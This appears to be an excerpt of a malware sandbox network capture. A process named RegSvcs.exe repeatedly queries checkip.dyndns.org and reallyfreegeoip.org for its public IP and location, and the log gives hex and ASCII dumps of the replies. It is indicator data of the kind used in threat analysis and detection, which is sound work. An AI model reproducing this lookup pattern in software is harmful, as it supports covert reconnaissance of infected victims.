Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49877 | 132.226.247.73 | 80 | 7076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:37.578123093 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:19:38.259926081 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:38 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49888 | 132.226.247.73 | 80 | 7076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:38.895000935 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:19:39.574192047 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:39 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 61846 | 132.226.247.73 | 80 | 7076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:40.201100111 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:19:40.899538040 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:40 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 61858 | 132.226.247.73 | 80 | 7076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:41.511126041 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:19:42.203093052 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:42 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49722 | 104.21.32.144 | 443 | 1672 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:19:17 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:19:17 UTC | 854 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:17 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862346
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAMDDFvESrqfZy43Dz%2B5E7PB6qDF3dLpVCA1lSlGIR3sIeyX6XGYZ9YhQECegiNRYbp0BzdLWebiVMfwfJ4dL5I4wz6I5%2BXfq9Nu7L%2BF51woZk3sdcWOVN1rAL2HnIZMHOHYZE5d"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c3b5901c327-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1645&rtt_var=822&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=420809&cwnd=189&unsent_bytes=0&cid=d3eae5d3bdcb4caf&ts=209&x=0"
2025-01-10 22:19:17 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49728 | 104.21.32.144 | 443 | 1672 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:19:18 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 22:19:18 UTC | 853 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:18 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862347
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9daF94mw4W3gaanQ1KDNn%2BuEOEe%2BKFcfnIICTuwjJOhCAyX8xe509jUpYeAwWI9Ir4CRPtt9x3HHDjtsY0yiRZ9cdxZdkkA50MOc1PNsfY4PIEmrJbCklZlxb6KrXUcjSXprLnY"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c417de272b9-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1783&rtt_var=683&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1585233&cwnd=217&unsent_bytes=0&cid=d47988d2e0d5c795&ts=283&x=0"
2025-01-10 22:19:18 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.6  49740        104.21.32.14    443               1672  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:19 UTC  61                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 22:19:20 UTC  861                IN
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:20 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862349
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SaGwwfGsS2R7vfBvHKAMU%2B1wpsMKF3URgrpyH9bhIa7ilayHoHAd%2BBsWCgMYPq4IqkuEYdP7BqXklmWGVUpZNBBFg31deoJ%2F1nGc8y9yOHmj9rmumynls%2BoRexJy4SMbOPT3%2B%2BfX"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c4a0dcbc327-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1596&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1775075&cwnd=189&unsent_bytes=0&cid=65a6253b432e4f4d&ts=155&x=0"
2025-01-10 22:19:20 UTC  362                IN
    Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.6  49752        104.21.32.14    443               1672  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:21 UTC  85                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:19:21 UTC  849                IN
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:21 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862350
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QGiK2AKRYM6Vd1sA9ZTpE7OPVzSqfOC8UH7KbeUTAAjieVHu8TVTtbBqaVbkg8UdKce1kY47SzRjMtGBAyMOtFETyVI7REckgs4dGN98k9YN9naMheiBh6CV0DdwDiciZpAQ9CiW"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c525c3fc327-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1704&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1691772&cwnd=189&unsent_bytes=0&cid=e55e85c0210874c1&ts=158&x=0"
2025-01-10 22:19:21 UTC  362                IN
    Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.6  49760        104.21.32.14    443               1672  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:22 UTC  85                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:19:22 UTC  859                IN
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:22 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862351
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpy7%2Fwqd%2F7fB1MFRiecZGCCyMXGdE33FqMfcjjofl%2BkXDp7o5F1ATsjVHDuGlm7lciSuzF9Z4dKadQha5Pjfj%2Bjy0RR%2BPdp2KaM7gvA6d2svpDuyA5o2sjmUyyaK2aZgN4F2RXze"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c5af9828cda-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1804&rtt_var=680&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1606160&cwnd=243&unsent_bytes=0&cid=267b5b857474f77d&ts=172&x=0"
2025-01-10 22:19:22 UTC  362                IN
    Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.6  49771        104.21.32.14    443               1672  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:24 UTC  85                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:19:24 UTC  861                IN
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:24 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862353
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHTCzBZnJ4idN4rbwnWnVV4TK320l1MwaiwK5mJerTjD1o%2BV%2Fzhvs5dkByGVzpSSr%2F0tUojkQeUTYoiZLMj4iWvtklU2bTAFHoDKJ3s%2BRBE6ekO10vu7GL8A7QOyHWpR%2FnPt%2FL7I"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c63b98272b9-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1827&rtt_var=719&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1488277&cwnd=217&unsent_bytes=0&cid=374aa4969fffed06&ts=151&x=0"
2025-01-10 22:19:24 UTC  362                IN
    Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.6  49783        104.21.32.14    443               1672  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:25 UTC  85                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:19:25 UTC  855                IN
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:25 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862354
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPQhyjRj9gOxpmqcBYyxpJ93KwqL9erG26oKBQuktSqLOPZz4m6LtfDFNPYLN8p524vFP8VVm5HecgMPzi%2FuPh4i%2FcvqH%2F4vewECNNDP7orGBgxJG0WZQPaEbodlqtRxEvzRBDHY"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c6c3a7d41a6-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=6274&min_rtt=6274&rtt_var=3137&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=148193&cwnd=241&unsent_bytes=0&cid=4745e3204750a86a&ts=175&x=0"
2025-01-10 22:19:25 UTC  362                IN
    Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.6  49794        104.21.32.14    443               1672  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 22:19:26 UTC  61                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 22:19:26 UTC  855                IN
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:26 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1862355
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y6%2FZPDtUyMXxErIk6Wq4GJ0eWXgya7NZMu9tsCF4Me8DUHYDJZ54aDceyETg2oHFT%2FMSxvMpf6c1ZFSb136yQaGi%2FtIKw1Iz1kJblXDT5mJn41pROciOiHu6WuLtSOl3H9FTd9bX"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90000c74ad4941a6-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1605&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1789215&cwnd=241&unsent_bytes=0&cid=f4afae1df6d7da3d&ts=180&x=0"
2025-01-10 22:19:26 UTC  362                IN
